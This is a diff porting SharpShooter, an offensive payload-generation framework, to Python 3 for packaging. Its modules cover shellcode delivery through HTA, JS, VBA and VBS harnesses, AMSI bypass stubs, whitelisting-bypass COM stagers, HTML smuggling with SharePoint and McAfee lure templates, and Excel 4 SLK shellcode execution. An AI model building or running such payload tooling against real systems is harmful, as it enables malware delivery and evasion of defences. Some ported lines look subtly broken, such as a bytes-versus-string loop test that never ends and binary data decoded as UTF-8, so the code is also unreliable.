Python3 fixes used in Kali package

SharpShooter.py

@@ -1,4 +1,4 @@
-#! /usr/bin/env python
+#!/usr/bin/env python3
 
 # -*- coding: utf-8 -*-
 #
@@ -17,6 +17,8 @@
 import string
 import sys
 import argparse
+import os
+import traceback
 from jsmin import jsmin
 from modules import *
 
@@ -162,12 +164,12 @@ def validate_args(self):
         return args
 
     def read_file(self, f):
-        with open(f, 'r') as fs:
+        with open(f, 'rb') as fs:
             content = fs.read()
         return content
 
     def rand_key(self, n):
-        return ''.join([random.choice(string.lowercase) for i in xrange(n)])
+        return ''.join([random.choice(string.ascii_lowercase) for i in range(n)])
 
     def gzip_str(self, string_):
         fgz = BytesIO()
@@ -182,7 +184,7 @@ def gzip_str(self, string_):
         return fgz
 
     def rc4(self, key, data):
-        S = range(256)
+        S = list(range(256))
         j = 0
         out = []
 
@@ -201,8 +203,9 @@ def rc4(self, key, data):
 
     def run(self, args):
 
-        template_body = ""
+        template_body = b""
         template_base = "templates/sharpshooter."
+        source_path = os.path.dirname(os.path.realpath(__file__)) + "/"
         shellcode_delivery = False
         shellcode_gzip = ""
         payload_type = 0
@@ -260,6 +263,7 @@ def run(self, args):
                 template_base = "templates/sharpshooterv4."
 
         #print(template_base)
+        template_base = source_path + template_base
 
         if(args.payload == "hta"):
             payload_type = 1
@@ -401,6 +405,7 @@ def run(self, args):
             except Exception as e:
                 print("\n\033[1;31m[!]\033[0;0m Incorrect choice")
 
+        template_body = template_body.decode(encoding='utf-8')
         template_code = template_body.replace("%SANDBOX_ESCAPES%", sandbox_techniques)
 
         delivery_method = "1"
@@ -425,16 +430,16 @@ def run(self, args):
                 shellcode_payload = shellcode_payload.lower()
                 if (shellcode_payload == "y" or shellcode_payload == "yes"):
                     shellcode_delivery = True
-                    shellcode_template = self.read_file("templates/shellcode.cs")
+                    shellcode_template = self.read_file(source_path + "templates/shellcode.cs")
 
                     shellcode = []
 
                     sc = self.read_file(args.shellcode_file)
                     shellcode.append(sc)
 
-                    shellcode = "\n".join(shellcode)
+                    shellcode = b"\n".join(shellcode)
 
-                    shellcode_final = shellcode_template.replace("%SHELLCODE%", shellcode)
+                    shellcode_final = shellcode_template.replace(b"%SHELLCODE%", shellcode)
                     shellcode_gzip = self.gzip_str(shellcode_final)
 
                 elif (args.stageless or stageless_payload is True):
@@ -444,7 +449,7 @@ def run(self, args):
                     #    sc_split = [encoded_sc[i:i+100] for i in range(0, len(encoded_sc), 100)]
                     #    for i in sc_split:
                     #else:
-                    template_code = template_code.replace("%SHELLCODE64%", encoded_sc)
+                    template_code = template_code.replace("%SHELLCODE64%", encoded_sc.decode(encoding='utf-8'))
 
                 else:
                     refs = args.refs
@@ -491,8 +496,8 @@ def run(self, args):
                     template_code = template_code.replace("%DELIVERY%", deliverycode)
 
                 break
-            except Exception as e:
-                print(e)
+            except Exception:
+                print(traceback.format_exc())
                 print("\n\033[1;31m[!]\033[0;0m Incorrect choice")
                 sys.exit(-1)
 
@@ -516,44 +521,44 @@ def run(self, args):
 
         key = self.rand_key(10)
         payload_encrypted = self.rc4(key, template_code)
-        payload_encoded = base64.b64encode(payload_encrypted)
+        payload_encoded = base64.b64encode(payload_encrypted.encode(encoding='utf-8'))
 
         awl_payload_simple = ""
 
         if("js" in file_type or args.comtechnique):
-            harness = self.read_file("templates/harness.js")
-            payload = harness.replace("%B64PAYLOAD%", payload_encoded)
+            harness = self.read_file(source_path + "templates/harness.js").decode(encoding='UTF-8')
+            payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8'))
             payload = payload.replace("%KEY%", "'%s'" % (key))
             payload_minified = jsmin(payload)
             awl_payload_simple = template_code
         elif("wsf" in file_type):
-            harness = self.read_file("templates/harness.wsf")
-            payload = harness.replace("%B64PAYLOAD%", payload_encoded)
+            harness = self.read_file(source_path + "templates/harness.wsf").decode(encoding='utf-8')
+            payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8'))
             payload = payload.replace("%KEY%", "'%s'" % (key))
             payload_minified = jsmin(payload)
         elif("hta" in file_type):
-            harness = self.read_file("templates/harness.hta")
-            payload = harness.replace("%B64PAYLOAD%", payload_encoded)
+            harness = self.read_file(source_path + "templates/harness.hta").decode(encoding='utf-8')
+            payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8'))
             payload = payload.replace("%KEY%", "'%s'" % (key))
             payload_minified = jsmin(payload)
         elif("vba" in file_type):
-            harness = self.read_file("templates/harness.vba")
-            payload = harness.replace("%B64PAYLOAD%", payload_encoded)
+            harness = self.read_file(source_path + "templates/harness.vba").decode(encoding='utf-8')
+            payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8'))
             payload = payload.replace("%KEY%", "\"%s\"" % (key))
             payload_minified = jsmin(payload)
         elif("slk" in file_type):
             pass
         else:
-            harness = self.read_file("templates/harness.vbs")
-            payload = harness.replace("%B64PAYLOAD%", payload_encoded)
+            harness = self.read_file(source_path + "templates/harness.vbs").decode(encoding='utf-8')
+            payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8'))
             payload = payload.replace("%KEY%", "\"%s\"" % (key))
 
         if (payload_type == 3):
             file_type = "jse"
         elif (payload_type == 5):
             file_type = "vbe"
 
-        f = open("output/" + outputfile_payload, 'w')
+        f = open(outputfile_payload, 'w')
         #print(payload)
         if(payload_type == 8):
             f.write(macro_stager)
@@ -563,9 +568,9 @@ def run(self, args):
 
         if(args.comtechnique):
             if not args.awltechnique or args.awltechnique == "wmic":
-                payload_file = "output/" + outputfile + ".xsl"
+                payload_file = outputfile + ".xsl"
             else:
-                payload_file = "output/" + outputfile + ".sct"
+                payload_file = outputfile + ".sct"
 
             #if("js" in file_type or "hta" in file_type or "wsf" in file_type):
             awl_payload = awl.create_com_stager(args.comtechnique, file_type, args.awlurl, payload_file, awl_payload_simple, args.amsi)
@@ -578,22 +583,22 @@ def run(self, args):
             f.write(payload)
         f.close()
 
-        print("\033[1;34m[*]\033[0;0m Written delivery payload to output/%s" % outputfile_payload)
+        print("\033[1;34m[*]\033[0;0m Written delivery payload to %s" % outputfile_payload)
         if shellcode_delivery:
             outputfile_shellcode = outputfile + ".payload"
-            with open("output/" + outputfile_shellcode, 'w') as f:
+            with open(outputfile_shellcode, 'w') as f:
                 gzip_encoded = base64.b64encode(shellcode_gzip.getvalue())
-                f.write(gzip_encoded)
+                f.write(gzip_encoded.decode(encoding='utf-8'))
                 f.close()
-                print("\033[1;34m[*]\033[0;0m Written shellcode payload to output/%s" % outputfile_shellcode)
+                print("\033[1;34m[*]\033[0;0m Written shellcode payload to %s" % outputfile_shellcode)
 
         if "vba" not in file_type:
             if (args.smuggle):
                 key = self.rand_key(10)
                 template = ""
                 template = args.template
-                embedinhtml.run_embedInHtml(key, "./output/" + outputfile_payload, "./output/" + outputfile + ".html", template)
+                embedinhtml.run_embedInHtml(key, outputfile_payload, outputfile + ".html", template)
 if __name__ == "__main__":
     ss = SharpShooter()
     args = ss.validate_args()
-    ss.run(args)
+    ss.run(args)

modules/amsikiller.py

@@ -1,4 +1,4 @@
-#!/usr/bin/python
+#!/usr/bin/env python3
 
 def amsi_stub(file_type, technique, filename):
 

modules/awl.py

@@ -1,4 +1,4 @@
-#!/usr/bin/python
+#!/usr/bin/env python3
 
 def create_com_stager(technique, filetype, awlurl, outputfile, sspayload, amsi):
 

modules/embedinhtml.py

@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
 # -*- coding: utf-8 -*-
 #
 # Original Author: Arno0x0x - https://twitter.com/Arno0x0x
@@ -63,7 +63,7 @@ def convertFromTemplate(parameters, templateFile):
 
 class RC4:
     def __init__(self, key=None):
-        self.state = range(256)  # initialisation de la table de permutation
+        self.state = list(range(256))  # initialisation de la table de permutation
         self.x = self.y = 0  # les index x et y, au lieu de i et j
 
         if key is not None:
@@ -72,19 +72,19 @@ def __init__(self, key=None):
 
     # Key schedule
     def init(self, key):
-        for i in range(256):
+        for i in list(range(256)):
             self.x = (ord(key[i % len(key)]) + self.state[i] + self.x) & 0xFF
             self.state[i], self.state[self.x] = self.state[self.x], self.state[i]
         self.x = 0
 
     # Encrypt binary input data
     def binaryEncrypt(self, data):
         output = [None] * len(data)
-        for i in range(len(data)):
+        for i in list(range(len(data))):
             self.x = (self.x + 1) & 0xFF
             self.y = (self.state[self.x] + self.y) & 0xFF
             self.state[self.x], self.state[self.y] = self.state[self.y], self.state[self.x]
-            output[i] = chr((data[i] ^ self.state[(self.state[self.x] + self.state[self.y]) & 0xFF]))
+            output[i] = chr((ord(data[i]) ^ self.state[(self.state[self.x] + self.state[self.y]) & 0xFF]))
         return ''.join(output)
 
     # Encrypt string input data
@@ -93,8 +93,8 @@ def stringEncrypt(self, data):
         Decrypt/encrypt the passed data using RC4 and the given key.
         https://github.com/EmpireProject/Empire/blob/73358262acc8ed3c34ffc87fa593655295b81434/data/agent/stagers/dropbox.py
         """
-        S, j, out = range(256), 0, []
-        for i in range(256):
+        S, j, out = list(range(256)), 0, []
+        for i in list(range(256)):
             j = (j + S[i] + ord(self.key[i % len(self.key)])) % 256
             S[i], S[j] = S[j], S[i]
         i = j = 0
@@ -114,7 +114,7 @@ def run_embedInHtml(key, fileName, outFileName, template_name):
 
     if key and fileName and outFileName:
         try:
-            with open(fileName) as fileHandle:
+            with open(fileName, 'rb') as fileHandle:
                 fileBytes = bytearray(fileHandle.read())
                 fileHandle.close()
                 print("\033[1;34m[*]\033[0;0m File [{}] successfully loaded !".format(fileName))
@@ -134,7 +134,7 @@ def run_embedInHtml(key, fileName, outFileName, template_name):
             print("\033[93m[!]\033[0;0m Could not determine the mime type for the input file. Force it using the -m switch.")
             quit()
 
-        payload = base64.b64encode(rc4Encryptor.binaryEncrypt(fileBytes))
+        payload = base64.b64encode(rc4Encryptor.binaryEncrypt(fileBytes.decode(encoding='utf-8')).encode())
         print("\033[1;34m[*]\033[0;0m Encrypted input file with key [{}]".format(key))
 
         # blobShim borrowed from https://github.com/mholt/PapaParse/issues/175#issuecomment-75597039
@@ -153,8 +153,8 @@ def run_embedInHtml(key, fileName, outFileName, template_name):
         varBlobObjectName = rand()
         varBlob = rand()
         varBlobShim = rand()
-        blobShimEncrypted = base64.b64encode(rc4Encryptor.stringEncrypt(blobShim))
-        blobObjectNameEncrypted = base64.b64encode(rc4Encryptor.stringEncrypt("Blob"))
+        blobShimEncrypted = base64.b64encode(rc4Encryptor.stringEncrypt(blobShim).encode())
+        blobObjectNameEncrypted = base64.b64encode(rc4Encryptor.stringEncrypt("Blob").encode())
         fileName = os.path.basename(fileName)
 
         params = {
@@ -188,18 +188,19 @@ def run_embedInHtml(key, fileName, outFileName, template_name):
                         if (template_choice < 1 or template_choice > 6):
                             raise Exception
                         if(template_choice == 1):
-                            templatesource = "./templates/sharepoint.tpl"
+                            templatesource = "templates/sharepoint.tpl"
                         elif(template_choice == 2):
-                            templatesource = "./templates/mcafee.tpl"
+                            templatesource = "templates/mcafee.tpl"
                         break
                     except:
                         print("\033[1;31m[!]\033[0;0m Incorrect choice")
             else:
                 templatesource = input("\033[1;34m[*]\033[0;0m Provide full path to custom template\n")
 
         else:
-            templatesource = "./templates/%s.tpl" % template_name
+            templatesource = "templates/%s.tpl" % template_name
 
+        templatesource = os.path.dirname(os.path.realpath(__file__)) + '/../' + templatesource
         resultHTML = convertFromTemplate(params, templatesource)
 
         if resultHTML is not None:

modules/excel4.py

@@ -1,12 +1,12 @@
-#!/usr/bin/python
+#!/usr/bin/env python3
 import sys
 
 # Some of this code is bastardised from code by @StanHacked
 # For a breakdown of this technique I recommend watching
 # http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen
 
-def bytes2int(str):
-	return int(str.encode('hex'), 16)
+def bytes2int(byte):
+    return int.from_bytes(byte, byteorder='big')
 
 SHELLCODE_HEADER = """ID;P
 O;E
@@ -25,28 +25,28 @@ def bytes2int(str):
 """
 
 def generate_slk(shellcode_path):
-	return build_shellcode_slk(shellcode_path)
+        return build_shellcode_slk(shellcode_path)
 
 def build_shellcode_slk(shellcode_path):
-	#print("[*] Building shellcode exec SLK")
+        #print("[*] Building shellcode exec SLK")
 
-	slk_output = SHELLCODE_HEADER
-	with open(shellcode_path, "rb") as f:
-	    byte = f.read(1)
-	    i = 0
-	    cell=0
-	    while byte != "":
-		if i == 0:
-			cell=cell+1
-			slk_output+=("C;X2;Y%s;K0;E" % (str(cell)))
-		else:
-			slk_output+=("&")
-		slk_output+=("CHAR(" + str(bytes2int(byte)) + ")")
-	        byte = f.read(1)
-		i+=1
-		if i == 20:
-			slk_output+=("\n")
-			i = 0
-	cell=cell+1
-	slk_output+=("\nC;X2;Y%s;K0;ERETURN()\nE\n" % (str(cell)))
-	return slk_output
+        slk_output = SHELLCODE_HEADER
+        with open(shellcode_path, "rb") as f:
+            byte = f.read(1)
+            i = 0
+            cell=0
+            while byte != "":
+                if i == 0:
+                        cell=cell+1
+                        slk_output+=("C;X2;Y%s;K0;E" % (str(cell)))
+                else:
+                        slk_output+=("&")
+                slk_output+=("CHAR(" + str(bytes2int(byte)) + ")")
+                byte = f.read(1)
+                i+=1
+                if i == 20:
+                        slk_output+=("\n")
+                        i = 0
+        cell=cell+1
+        slk_output+=("\nC;X2;Y%s;K0;ERETURN()\nE\n" % (str(cell)))
+        return slk_output